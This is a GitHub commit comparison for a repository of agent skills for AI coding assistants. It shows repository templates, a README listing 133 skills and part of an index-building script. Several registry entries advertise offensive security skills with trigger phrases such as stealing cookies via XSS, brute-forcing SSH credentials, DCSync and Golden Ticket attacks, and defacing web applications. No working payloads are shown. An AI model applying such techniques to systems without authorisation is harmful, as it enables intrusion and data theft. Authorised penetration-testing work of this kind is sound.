Compare commits
32 Commits
| SHA1 |
|---|
| `b5675d55ce` |
| `6dcb7973ad` |
| `9850b6b8e7` |
| `46d575b8d0` |
| `02fab354e0` |
| `226a7596cb` |
| `11c16dbe27` |
| `95eeb1dd4b` |
| `b1e4d61715` |
| `d17e7bc767` |
| `450a8a95a5` |
| `7a14904fd3` |
| `59a349075e` |
| `d8b9ac19b2` |
| `68a457b96b` |
| `98756d75ae` |
| `4ee569d5d5` |
| `8a4b4383e8` |
| `9d09626fd2` |
| `014da3e744` |
| `113bc99e47` |
| `3e46a495c9` |
| `faf478f389` |
| `266cbf4c6c` |
| `f8eaf7bd50` |
| `4dcd96e484` |
| `c86c93582e` |
| `d32f89a211` |
| `1aa169c842` |
| `c9280cf9cf` |
| `0fff14df81` |
| `8bd204708b` |
**`.github/CODEOWNERS`** (new file, vendored, 8 lines)

@@ -0,0 +1,8 @@

```
# Global owners
* @sickn33

# Skills
/skills/ @sickn33

# Documentation
*.md @sickn33
```
**`.github/ISSUE_TEMPLATE/bug_report.md`** (new file, vendored, 33 lines)

@@ -0,0 +1,33 @@

```markdown
---
name: Bug Report
about: Create a report to help us improve the skills
title: "[BUG] "
labels: bug
assignees: sickn33
---

**Describe the bug**
A clear and concise description of what the bug is.

**To Reproduce**
Steps to reproduce the behavior:

1. Go to '...'
2. Click on '...'
3. Scroll down to '...'
4. See error

**Expected behavior**
A clear and concise description of what you expected to happen.

**Screenshots**
If applicable, add screenshots to help explain your problem.

**Environment (please complete the following information):**

- OS: [e.g. macOS, Windows]
- Tool: [e.g. Claude Code, Antigravity]
- Version: [if known]

**Additional context**
Add any other context about the problem here.
```
**`.github/ISSUE_TEMPLATE/feature_request.md`** (new file, vendored, 19 lines)

@@ -0,0 +1,19 @@

```markdown
---
name: Skill Request
about: Suggest a new skill for the collection
title: "[REQ] "
labels: enhancement
assignees: sickn33
---

**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex: I'm always frustrated when [...]

**Describe the solution you'd like**
A description of the skill you want. What trigger should it have? What files should it affect?

**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.

**Additional context**
Add any other context or screenshots about the feature request here.
```
**`.github/PULL_REQUEST_TEMPLATE.md`** (new file, vendored, 18 lines)

@@ -0,0 +1,18 @@

```markdown
## Description

Please describe your changes. What skill are you adding or modifying?

## Checklist

- [ ] My skill follows the [creation guidelines](https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/skill-creator)
- [ ] I have run `validate_skills.py`
- [ ] I have added my name to the credits (if applicable)

## Type of Change

- [ ] New Skill
- [ ] Bug Fix
- [ ] Documentation Update
- [ ] Infrastructure

## Screenshots (if applicable)
```
**`.gitignore`** (new file, vendored, 6 lines)

@@ -0,0 +1,6 @@

```
MAINTENANCE.md
walkthrough.md
.agent/rules/
.gemini/
LOCAL_CONFIG.md
```
**`README.md`** (275 lines)

@@ -1,62 +1,277 @@

# 🌌 Antigravity Awesome Skills: 133+ Agentic Skills for Claude Code, Gemini CLI, Cursor, Copilot & More

> **The Ultimate Collection of 133+ Universal Agentic Skills for AI Coding Assistants — Claude Code, Gemini CLI, Codex CLI, Antigravity IDE, GitHub Copilot, Cursor, OpenCode**

[MIT License](https://opensource.org/licenses/MIT)
[Claude Code](https://claude.ai)
[Gemini CLI](https://github.com/google-gemini/gemini-cli)
[Codex CLI](https://github.com/openai/codex)
[Cursor](https://cursor.sh)
[GitHub Copilot](https://github.com/features/copilot)
[OpenCode](https://github.com/opencode-ai/opencode)
[Antigravity](https://github.com/anthropics/antigravity)

**Antigravity Awesome Skills** is a curated, battle-tested library of **133 high-performance agentic skills** designed to work seamlessly across all major AI coding assistants:

- 🟣 **Claude Code** (Anthropic CLI)
- 🔵 **Gemini CLI** (Google DeepMind)
- 🟢 **Codex CLI** (OpenAI)
- 🔴 **Antigravity IDE** (Google DeepMind)
- 🩵 **GitHub Copilot** (VSCode Extension)
- 🟠 **Cursor** (AI-native IDE)
- ⚪ **OpenCode** (Open-source CLI)

This repository provides essential skills to transform your AI assistant into a **full-stack digital agency**, including official capabilities from **Anthropic**, **OpenAI**, **Google**, and **Vercel Labs**.
## 📍 Table of Contents

- [🔌 Compatibility](#-compatibility)
- [Features & Categories](#features--categories)
- [Full Skill Registry](#full-skill-registry-133133)
- [Installation](#installation)
- [How to Contribute](#how-to-contribute)
- [Credits & Sources](#credits--sources)
- [License](#license)

---

## 🔌 Compatibility

These skills follow the universal **SKILL.md** format and work with any AI coding assistant that supports agentic skills:

| Tool | Type | Compatibility | Installation Path |
| --- | --- | --- | --- |
| **Claude Code** | CLI | ✅ Full | `.claude/skills/` or `.agent/skills/` |
| **Gemini CLI** | CLI | ✅ Full | `.gemini/skills/` or `.agent/skills/` |
| **Codex CLI** | CLI | ✅ Full | `.codex/skills/` or `.agent/skills/` |
| **Antigravity IDE** | IDE | ✅ Full | `.agent/skills/` |
| **Cursor** | IDE | ✅ Full | `.cursor/skills/` or project root |
| **GitHub Copilot** | Extension | ⚠️ Partial | Copy skill content to `.github/copilot/` |
| **OpenCode** | CLI | ✅ Full | `.opencode/skills/` or `.agent/skills/` |

> [!TIP]
> Most tools auto-discover skills in `.agent/skills/`. For maximum compatibility, clone to this directory.
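The tool-specific paths in the table can also be collapsed onto the shared `.agent/skills/` copy. A minimal sketch, assuming a POSIX shell, a project root, and that none of these paths exist yet (the directory names come from the compatibility table):

```shell
#!/bin/sh
# Keep one canonical skills directory and point the
# tool-specific paths at it via symlinks, so every tool
# discovers the same skill set.
set -e

mkdir -p .agent/skills

# Tool-specific directories from the compatibility table.
for dir in .claude .gemini .codex .cursor .opencode; do
  mkdir -p "$dir"
  # Create the symlink only if nothing is there yet.
  [ -e "$dir/skills" ] || ln -s ../.agent/skills "$dir/skills"
done
```

With this layout, updating the one clone in `.agent/skills/` updates every tool at once; to remove a tool, delete its symlink rather than the target directory.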
---

Whether you are using **Gemini CLI**, **Claude Code**, **Codex CLI**, **Cursor**, **GitHub Copilot**, **Antigravity**, or **OpenCode**, these skills are designed to drop right in and supercharge your AI agent.

This repository aggregates the best capabilities from across the open-source community, transforming your AI assistant into a full-stack digital agency capable of Engineering, Design, Security, Marketing, and Autonomous Operations.

## Features & Categories

The repository is organized into several key areas of expertise:

| Category | Skills Count | Key Skills Included |
| :--- | :--- | :--- |
| **🛡️ Cybersecurity** | **~50** | Ethical Hacking, Metasploit, Burp Suite, SQLMap, Active Directory, AWS/Cloud Pentesting, OWASP Top 100, Red Team Tools |
| **🛠️ Development** | **~25** | TDD, Systematic Debugging, React Patterns, Backend/Frontend Guidelines, Senior Fullstack, Software Architecture |
| **🎨 Creative & Design** | **~10** | UI/UX Pro Max, Frontend Design, Canvas, Algorithmic Art, Theme Factory, D3 Viz, Web Artifacts |
| **🤖 AI & LLM Development** | **~8** | LLM App Patterns, Autonomous Agent Patterns, Prompt Engineering, Prompt Library, JavaScript Mastery, Bun Development |
| **🛸 Autonomous & Agentic** | **~8** | Loki Mode (Startup-in-a-box), Subagent Driven Dev, Dispatching Parallel Agents, Planning With Files, Skill Creator/Developer |
| **📄 Document Processing** | **~4** | DOCX (Official), PDF (Official), PPTX (Official), XLSX (Official) |
| **📈 Product & Strategy** | **~8** | Product Manager Toolkit, Content Creator, ASO, Doc Co-authoring, Brainstorming, Internal Comms |
| **🏗️ Infrastructure & Git** | **~8** | Linux Shell Scripting, Git Worktrees, Git Pushing, Conventional Commits, File Organization, GitHub Workflow Automation |
| **🔄 Workflow & Planning** | **~6** | Writing Plans, Executing Plans, Concise Planning, Verification Before Completion, Code Review (Requesting/Receiving) |
| **🧪 Testing & QA** | **~4** | Webapp Testing, Playwright Automation, Test Fixing, Testing Patterns |

---
## Full Skill Registry (133/133)

Below is the complete list of available skills. Each skill folder contains a `SKILL.md` that can be imported into Antigravity or Claude Code.

> [!NOTE]
> **Document Skills**: We provide both **community** and **official Anthropic** versions for DOCX, PDF, PPTX, and XLSX. Locally, the official versions are used by default (via symlinks). In the repository, both versions are available for flexibility.
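The exact `SKILL.md` schema is defined by the skill-creator guidelines rather than reproduced here; as a rough, hypothetical sketch, a skill file opens with YAML front matter naming and describing the skill, followed by the instructions themselves (the field names and example values below are assumptions, not taken from this repository):

```markdown
---
name: my-example-skill
description: Use when the user asks to do X; provides step-by-step guidance for Y.
---

# My Example Skill

Instructions the agent should follow when this skill is triggered...
```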
|
||||
|
||||
| Skill Name | Description | Path |
|
||||
| :-------------------------------------------------- | :------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :-------------------------------------- |
|
||||
| **API Fuzzing for Bug Bounty** | This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques. | `skills/api-fuzzing-bug-bounty` |
|
||||
| **AWS Penetration Testing** | This skill should be used when the user asks to "pentest AWS", "test AWS security", "enumerate IAM", "exploit cloud infrastructure", "AWS privilege escalation", "S3 bucket testing", "metadata SSRF", "Lambda exploitation", or needs guidance on Amazon Web Services security assessment. | `skills/aws-penetration-testing` |
|
||||
| **Active Directory Attacks** | This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing. | `skills/active-directory-attacks` |
|
||||
| **Address GitHub Comments** | Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI. | `skills/address-github-comments` |
|
||||
| **Agent Manager Skill** | Use when you need to manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling. | `skills/agent-manager-skill` |
|
||||
| **Algorithmic Art** | Creating algorithmic art using p5. | `skills/algorithmic-art` |
|
||||
| **App Store Optimization** | Complete App Store Optimization (ASO) toolkit for researching, optimizing, and tracking mobile app performance on Apple App Store and Google Play Store. | `skills/app-store-optimization` |
|
||||
| **Autonomous Agent Patterns** | "Design patterns for building autonomous coding agents. | `skills/autonomous-agent-patterns` |
|
||||
| **Backend Guidelines** | Comprehensive backend development guide for Node. | `skills/backend-dev-guidelines` |
|
||||
| **Brainstorming** | "You MUST use this before any creative work - creating features, building components, adding functionality, or modifying behavior. | `skills/brainstorming` |
|
||||
| **BlockRun** | Agent wallet for LLM micropayments. Use when user needs capabilities Claude lacks (image generation, real-time X/Twitter data) or explicitly requests external models ("blockrun", "use grok", "use gpt", "dall-e", "deepseek"). | `skills/blockrun` |
|
||||
| **Brand Guidelines (Anthropic)** | Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. | `skills/brand-guidelines-anthropic` |
|
||||
| **Brand Guidelines (Community)** | Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. | `skills/brand-guidelines-community` |
|
||||
| **Broken Authentication Testing** | This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". | `skills/broken-authentication` |
|
||||
| **Bun Development** | "Modern JavaScript/TypeScript development with Bun runtime. | `skills/bun-development` |
|
||||
| **Burp Suite Web Application Testing** | This skill should be used when the user asks to "intercept HTTP traffic", "modify web requests", "use Burp Suite for testing", "perform web vulnerability scanning", "test with Burp Repeater", "analyze HTTP history", or "configure proxy for web testing". | `skills/burp-suite-testing` |
|
||||
| **Canvas Design** | Create beautiful visual art in . | `skills/canvas-design` |
|
||||
| **Claude Code Guide** | Master guide for using Claude Code effectively. | `skills/claude-code-guide` |
|
||||
| **Claude D3.js** | Creating interactive data visualisations using d3. | `skills/claude-d3js-skill` |
|
||||
| **Cloud Penetration Testing** | This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". | `skills/cloud-penetration-testing` |
|
||||
| **Concise Planning** | Use when a user asks for a plan for a coding task, to generate a clear, actionable, and atomic checklist. | `skills/concise-planning` |
|
||||
| **Content Creator** | Create SEO-optimized marketing content with consistent brand voice. | `skills/content-creator` |
|
||||
| **Core Components** | Core component library and design system patterns. | `skills/core-components` |
|
||||
| **Cross-Site Scripting and HTML Injection Testing** | This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection vulnerabilities", "steal cookies via XSS", or "bypass content security policies". | `skills/xss-html-injection` |
|
||||
| **Dispatching Parallel Agents** | Use when facing 2+ independent tasks that can be worked on without shared state or sequential dependencies. | `skills/dispatching-parallel-agents` |
|
||||
| **Doc Co-authoring** | Guide users through a structured workflow for co-authoring documentation. | `skills/doc-coauthoring` |
|
||||
| **DOCX (Official)** | "Comprehensive document creation, editing, and analysis with support for tracked changes, comments, formatting preservation, and text extraction. | `skills/docx-official` |
|
||||
| **Ethical Hacking Methodology** | This skill should be used when the user asks to "learn ethical hacking", "understand penetration testing lifecycle", "perform reconnaissance", "conduct security scanning", "exploit vulnerabilities", or "write penetration test reports". | `skills/ethical-hacking-methodology` |
|
||||
| **Executing Plans** | Use when you have a written implementation plan to execute in a separate session with review checkpoints. | `skills/executing-plans` |
|
||||
| **File Organizer** | Intelligently organizes files and folders by understanding context, finding duplicates, and suggesting better organizational structures. | `skills/file-organizer` |
|
||||
| **File Path Traversal Testing** | This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". | `skills/file-path-traversal` |
|
||||
| **Finishing Dev Branch** | Use when implementation is complete, all tests pass, and you need to decide how to integrate the work - guides completion of development work by presenting structured options for merge, PR, or cleanup. | `skills/finishing-a-development-branch` |
|
||||
| **Frontend Design** | Create distinctive, production-grade frontend interfaces with high design quality. | `skills/frontend-design` |
|
||||
| **Frontend Guidelines** | Frontend development guidelines for React/TypeScript applications. | `skills/frontend-dev-guidelines` |
|
||||
| **Git Pushing** | Stage, commit, and push git changes with conventional commit messages. | `skills/git-pushing` |
|
||||
| **GitHub Workflow Automation** | "Automate GitHub workflows with AI assistance. | `skills/github-workflow-automation` |
|
||||
| **HTML Injection Testing** | This skill should be used when the user asks to "test for HTML injection", "inject HTML into web pages", "perform HTML injection attacks", "deface web applications", or "test content injection vulnerabilities". | `skills/html-injection-testing` |
|
||||
| **IDOR Vulnerability Testing** | This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references," or "bypass authorization to access other users' data. | `skills/idor-testing` |
|
||||
| **Internal Comms (Anthropic)** | A set of resources to help me write all kinds of internal communications, using the formats that my company likes to use. | `skills/internal-comms-anthropic` |
|
||||
| **Internal Comms (Community)** | A set of resources to help me write all kinds of internal communications, using the formats that my company likes to use. | `skills/internal-comms-community` |
|
||||
| **JavaScript Mastery** | "Comprehensive JavaScript reference covering 33+ essential concepts every developer should know. | `skills/javascript-mastery` |
|
||||
| **Kaizen** | Guide for continuous improvement, error proofing, and standardization. | `skills/kaizen` |
|
||||
| **Linux Privilege Escalation** | This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". | `skills/linux-privilege-escalation` |
|
||||
| **Linux Shell Scripting** | This skill should be used when the user asks to "create bash scripts", "automate Linux tasks", "monitor system resources", "backup files", "manage users", or "write production shell scripts". | `skills/linux-shell-scripting` |
|
||||
| **LLM App Patterns** | "Production-ready patterns for building LLM applications. | `skills/llm-app-patterns` |
|
||||
| **Loki Mode** | Multi-agent autonomous startup system for Claude Code. | `skills/loki-mode` |
|
||||
| **MCP Builder** | Guide for creating high-quality MCP (Model Context Protocol) servers that enable LLMs to interact with external services through well-designed tools. | `skills/mcp-builder` |
|
||||
| **Metasploit Framework** | This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". | `skills/metasploit-framework` |
|
||||
| **Network 101** | This skill should be used when the user asks to "set up a web server", "configure HTTP or HTTPS", "perform SNMP enumeration", "configure SMB shares", "test network services", or needs guidance on configuring and testing network services for penetration testing labs. | `skills/network-101` |
|
||||
| **NotebookLM** | Use this skill to query your Google NotebookLM notebooks directly from Claude Code for source-grounded, citation-backed answers from Gemini. | `skills/notebooklm` |
|
||||
| **PDF (Official)** | Comprehensive PDF manipulation toolkit for extracting text and tables, creating new PDFs, merging/splitting documents, and handling forms. | `skills/pdf-official` |
|
||||
| **Pentest Checklist** | This skill should be used when the user asks to "plan a penetration test", "create a security assessment checklist", "prepare for penetration testing", "define pentest scope", "follow security testing best practices", or needs a structured methodology for penetration testing engagements. | `skills/pentest-checklist` |
|
||||
| **Pentest Commands** | This skill should be used when the user asks to "run pentest commands", "scan with nmap", "use metasploit exploits", "crack passwords with hydra or john", "scan web vulnerabilities with nikto", "enumerate networks", or needs essential penetration testing command references. | `skills/pentest-commands` |
|
||||
| **Planning With Files** | Implements Manus-style file-based planning for complex tasks. | `skills/planning-with-files` |
|
||||
| **Playwright Automation** | Complete browser automation with Playwright. | `skills/playwright-skill` |
|
||||
| **PPTX (Official)** | "Presentation creation, editing, and analysis. | `skills/pptx-official` |
|
||||
| **Privilege Escalation Methods** | This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems. | `skills/privilege-escalation-methods` |
|
||||
| **Product Toolkit** | Comprehensive toolkit for product managers including RICE prioritization, customer interview analysis, PRD templates, discovery frameworks, and go-to-market strategies. | `skills/product-manager-toolkit` |
|
||||
| **Prompt Engineering** | Expert guide on prompt engineering patterns, best practices, and optimization techniques. | `skills/prompt-engineering` |
|
||||
| **Prompt Library** | "Curated collection of high-quality prompts for various use cases. | `skills/prompt-library` |
|
||||
| **React Best Practices** | React and Next. | `skills/react-best-practices` |
|
||||
| **React UI Patterns** | Modern React UI patterns for loading states, error handling, and data fetching. | `skills/react-ui-patterns` |
|
||||
| **Receiving Code Review** | Use when receiving code review feedback, before implementing suggestions, especially if feedback seems unclear or technically questionable - requires technical rigor and verification, not performative agreement or blind implementation. | `skills/receiving-code-review` |
|
||||
| **Red Team Tools and Methodology** | This skill should be used when the user asks to "follow red team methodology", "perform bug bounty hunting", "automate reconnaissance", "hunt for XSS vulnerabilities", "enumerate subdomains", or needs security researcher techniques and tool configurations from top bug bounty hunters. | `skills/red-team-tools` |
|
||||
| **Requesting Code Review** | Use when completing tasks, implementing major features, or before merging to verify work meets requirements. | `skills/requesting-code-review` |
|
||||
| **SMTP Penetration Testing** | This skill should be used when the user asks to "perform SMTP penetration testing", "enumerate email users", "test for open mail relays", "grab SMTP banners", "brute force email credentials", or "assess mail server security". | `skills/smtp-penetration-testing` |
|
||||
| **SQL Injection Testing** | This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query vulnerabilities". | `skills/sql-injection-testing` |
|
||||
| **SQLMap Database Penetration Testing** | This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing. | `skills/sqlmap-database-pentesting` |
|
||||
| **SSH Penetration Testing** | This skill should be used when the user asks to "pentest SSH services", "enumerate SSH configurations", "brute force SSH credentials", "exploit SSH vulnerabilities", "perform SSH tunneling", or "audit SSH security". | `skills/ssh-penetration-testing` |
|
||||
| **Security Scanning Tools** | This skill should be used when the user asks to "perform vulnerability scanning", "scan networks for open ports", "assess web application security", "scan wireless networks", "detect malware", "check cloud security", or "evaluate system compliance". | `skills/scanning-tools` |
|
||||
| **Senior Architect** | Comprehensive software architecture skill for designing scalable, maintainable systems using ReactJS, NextJS, NodeJS, Express, React Native, Swift, Kotlin, Flutter, Postgres, GraphQL, Go, Python. | `skills/senior-architect` |
|
||||
| **Senior Fullstack** | Comprehensive fullstack development skill for building complete web applications with React, Next. | `skills/senior-fullstack` |
|
||||
| **Shodan Reconnaissance and Pentesting** | This skill should be used when the user asks to "search for exposed devices on the internet," "perform Shodan reconnaissance," "find vulnerable services using Shodan," "scan IP ranges with Shodan," or "discover IoT devices and open ports. | `skills/shodan-reconnaissance` |
|
||||
| **Shopify Development** | Build Shopify apps, extensions, themes using GraphQL Admin API, Shopify CLI, Polaris UI, and Liquid. Use when user asks about "shopify app", "checkout extension", "shopify theme", "liquid template", "polaris", "shopify graphql", "shopify webhook", or "metafields". | `skills/shopify-development` |
|
||||
| **Skill Creator** | Guide for creating effective skills. | `skills/skill-creator` |
|
||||
| **Skill Developer** | Create and manage Claude Code skills following Anthropic best practices. | `skills/skill-developer` |
|
||||
| **Slack GIF Creator** | Knowledge and utilities for creating animated GIFs optimized for Slack. | `skills/slack-gif-creator` |
|
||||
| **Software Architecture** | Guide for quality focused software architecture. | `skills/software-architecture` |
|
||||
| **Subagent Driven Dev** | Use when executing implementation plans with independent tasks in the current session. | `skills/subagent-driven-development` |
|
||||
| **Systematic Debugging** | Use when encountering any bug, test failure, or unexpected behavior, before proposing fixes. | `skills/systematic-debugging` |
|
||||
| **TDD** | Use when implementing any feature or bugfix, before writing implementation code. | `skills/test-driven-development` |
|
||||
| **Test Fixing** | Run tests and systematically fix all failing tests using smart error grouping. | `skills/test-fixing` |
|
||||
| **Testing Patterns** | Jest testing patterns, factory functions, mocking strategies, and TDD workflow. | `skills/testing-patterns` |
|
||||
| **Theme Factory** | Toolkit for styling artifacts with a theme. | `skills/theme-factory` |
|
||||
| **Top 100 Vulnerabilities** | This skill should be used when the user asks to "identify web application vulnerabilities", "explain common security flaws", "understand vulnerability categories", "learn about injection attacks", "review access control weaknesses", "analyze API security issues", "assess security misconfigurations", "understand client-side vulnerabilities", "examine mobile and IoT security flaws", or "reference the OWASP-aligned vulnerability taxonomy". | `skills/top-web-vulnerabilities` |
|
||||
| **UI/UX Pro Max** | "UI/UX design intelligence. | `skills/ui-ux-pro-max` |
|
||||
| **Using Git Worktrees** | Use when starting feature work that needs isolation from the current workspace or before executing implementation plans - creates isolated git worktrees with smart directory selection and safety verification. | `skills/using-git-worktrees` |
| **Using Superpowers** | Use when starting any conversation - establishes how to find and use skills, requiring Skill tool invocation before ANY response, including clarifying questions. | `skills/using-superpowers` |
| **Verification Before Completion** | Use when about to claim work is complete, fixed, or passing, before committing or creating PRs - requires running verification commands and confirming output before making any success claims; evidence before assertions, always. | `skills/verification-before-completion` |
| **Web Artifacts** | Suite of tools for creating elaborate, multi-component claude.ai artifacts. | `skills/web-artifacts-builder` |
| **Web Design Guidelines** | Review UI code for Web Interface Guidelines compliance. | `skills/web-design-guidelines` |
| **Webapp Testing** | Toolkit for interacting with and testing local web applications using Playwright. | `skills/webapp-testing` |
| **Windows Privilege Escalation** | This skill should be used when the user asks to "escalate privileges on Windows", "find Windows privesc vectors", "enumerate Windows for privilege escalation", "exploit Windows misconfigurations", or "perform post-exploitation privilege escalation". | `skills/windows-privilege-escalation` |
| **Wireshark Network Traffic Analysis** | This skill should be used when the user asks to "analyze network traffic with Wireshark", "capture packets for troubleshooting", "filter PCAP files", "follow TCP/UDP streams", "detect network anomalies", "investigate suspicious traffic", or "perform protocol analysis". | `skills/wireshark-analysis` |
| **Workflow Automation** | Design and implement automated workflows combining visual logic with custom code. | `skills/workflow-automation` |
| **WordPress Penetration Testing** | This skill should be used when the user asks to "pentest WordPress sites", "scan WordPress for vulnerabilities", "enumerate WordPress users, themes, or plugins", "exploit WordPress vulnerabilities", or "use WPScan". | `skills/wordpress-penetration-testing` |
| **Writing Plans** | Use when you have a spec or requirements for a multi-step task, before touching code. | `skills/writing-plans` |
| **Writing Skills** | Use when creating new skills, editing existing skills, or verifying skills work before deployment. | `skills/writing-skills` |
| **XLSX (Official)** | Comprehensive spreadsheet creation, editing, and analysis with support for formulas, formatting, data analysis, and visualization. | `skills/xlsx-official` |
> [!TIP]
> Use the `validate_skills.py` script in the `scripts/` directory to ensure all skills are properly formatted and ready for use.

---

## Installation

To use these skills with **Claude Code**, **Gemini CLI**, **Codex CLI**, **Cursor**, **Antigravity**, or **OpenCode**, clone this repository into your agent's skills directory:

```bash
# Universal installation (works with most tools)
git clone https://github.com/sickn33/antigravity-awesome-skills.git .agent/skills

# Claude Code specific
git clone https://github.com/sickn33/antigravity-awesome-skills.git .claude/skills

# Gemini CLI specific
git clone https://github.com/sickn33/antigravity-awesome-skills.git .gemini/skills

# Cursor specific
git clone https://github.com/sickn33/antigravity-awesome-skills.git .cursor/skills
```

Or copy individual `SKILL.md` files into your existing configuration.

---
## How to Contribute

We welcome contributions from the community! To add a new skill:

1. **Fork** the repository.
2. **Create a new directory** inside `skills/` for your skill.
3. **Add a `SKILL.md`** with the required frontmatter (name and description).
4. **Run validation**: `python3 scripts/validate_skills.py`.
5. **Submit a Pull Request**.
Please ensure your skill follows the Antigravity/Claude Code best practices.
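For reference, a minimal `SKILL.md` skeleton might look like the following (the skill name and wording here are illustrative, not a real entry in this repository):

```markdown
---
name: my-new-skill
description: Use when <trigger conditions> - one or two sentences on what the skill does and when an agent should invoke it.
---

# My New Skill

Short explanation of the workflow, inputs, and expected outputs.
```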

---

## Credits & Sources

This collection would not be possible without the incredible work of the Claude Code community and official sources:

### Official Sources

- **[anthropics/skills](https://github.com/anthropics/skills)**: Official Anthropic skills repository - Document manipulation (DOCX, PDF, PPTX, XLSX), Brand Guidelines, Internal Communications.
- **[anthropics/claude-cookbooks](https://github.com/anthropics/claude-cookbooks)**: Official notebooks and recipes for building with Claude.
- **[vercel-labs/agent-skills](https://github.com/vercel-labs/agent-skills)**: Vercel Labs official skills - React Best Practices, Web Design Guidelines.
- **[openai/skills](https://github.com/openai/skills)**: OpenAI Codex skills catalog - Agent skills, Skill Creator, Concise Planning.

### Community Contributors

- **[obra/superpowers](https://github.com/obra/superpowers)**: The original "Superpowers" by Jesse Vincent.
- **[guanyang/antigravity-skills](https://github.com/guanyang/antigravity-skills)**: The original framework, core Antigravity extensions, and the initial set of 33 skills.
- **[diet103/claude-code-infrastructure-showcase](https://github.com/diet103/claude-code-infrastructure-showcase)**: Infrastructure, Backend/Frontend Guidelines, and Skill Development meta-skills.
- **[ChrisWiles/claude-code-showcase](https://github.com/ChrisWiles/claude-code-showcase)**: React UI patterns, Design System components, and Testing factories.
- **[travisvn/awesome-claude-skills](https://github.com/travisvn/awesome-claude-skills)**: Autonomous agents (Loki Mode), Playwright integration, and D3.js visualization.
- **[zebbern/claude-code-guide](https://github.com/zebbern/claude-code-guide)**: Comprehensive Security suite (Ethical Hacking, OWASP, AWS Auditing) - source for ~60 skills.
- **[alirezarezvani/claude-skills](https://github.com/alirezarezvani/claude-skills)**: Senior Engineering roles, Product Management toolkit, Content Creator & ASO skills.
- **[karanb192/awesome-claude-skills](https://github.com/karanb192/awesome-claude-skills)**: A massive list of verified skills for Claude Code.
- **[zircote/.claude](https://github.com/zircote/.claude)**: Shopify development skill reference.

### Inspirations

- **[f/awesome-chatgpt-prompts](https://github.com/f/awesome-chatgpt-prompts)**: Inspiration for the Prompt Library.
- **[leonardomso/33-js-concepts](https://github.com/leonardomso/33-js-concepts)**: Inspiration for JavaScript Mastery.

---
## License

MIT License. See [LICENSE](LICENSE) for details.

Individual skills may retain the licenses of their original repositories.

---

**Keywords**: Claude Code, Gemini CLI, Codex CLI, Antigravity IDE, GitHub Copilot, Cursor, OpenCode, Agentic Skills, AI Coding Assistant, AI Agent Skills, MCP, Model Context Protocol, AI Agents, Autonomous Coding, Security Auditing, React Patterns, LLM Tools, AI IDE, Coding AI, AI Pair Programming, Vibe Coding, Agentic Coding, AI Developer Tools.

---

## GitHub Topics

For repository maintainers, add these topics to maximize discoverability:

```text
claude-code, gemini-cli, codex-cli, antigravity, cursor, github-copilot, opencode,
agentic-skills, ai-coding, llm-tools, ai-agents, autonomous-coding, mcp
```

72
scripts/generate_index.py
Normal file
@@ -0,0 +1,72 @@
import os
import json
import re

def generate_index(skills_dir, output_file):
    print(f"🏗️ Generating index from: {skills_dir}")
    skills = []

    for root, dirs, files in os.walk(skills_dir):
        if "SKILL.md" in files:
            skill_path = os.path.join(root, "SKILL.md")
            dir_name = os.path.basename(root)

            skill_info = {
                "id": dir_name,
                "path": os.path.relpath(root, os.path.dirname(skills_dir)),
                "name": dir_name.replace("-", " ").title(),
                "description": ""
            }

            with open(skill_path, 'r', encoding='utf-8') as f:
                content = f.read()

            # Try to extract from frontmatter first
            fm_match = re.search(r'^---\s*(.*?)\s*---', content, re.DOTALL)
            if fm_match:
                fm_content = fm_match.group(1)
                name_fm = re.search(r'^name:\s*(.+)$', fm_content, re.MULTILINE)
                desc_fm = re.search(r'^description:\s*(.+)$', fm_content, re.MULTILINE)

                if name_fm:
                    skill_info["name"] = name_fm.group(1).strip()
                if desc_fm:
                    skill_info["description"] = desc_fm.group(1).strip()

            # Fall back to the first heading and first paragraph if needed
            if not skill_info["description"]:
                name_match = re.search(r'^#\s+(.+)$', content, re.MULTILINE)
                if name_match and not fm_match:  # Only override if no frontmatter name
                    skill_info["name"] = name_match.group(1).strip()

                # Extract first paragraph
                body = content
                if fm_match:
                    body = content[fm_match.end():].strip()

                lines = body.split('\n')
                desc_lines = []
                for line in lines:
                    if line.startswith('#') or not line.strip():
                        if desc_lines:
                            break
                        continue
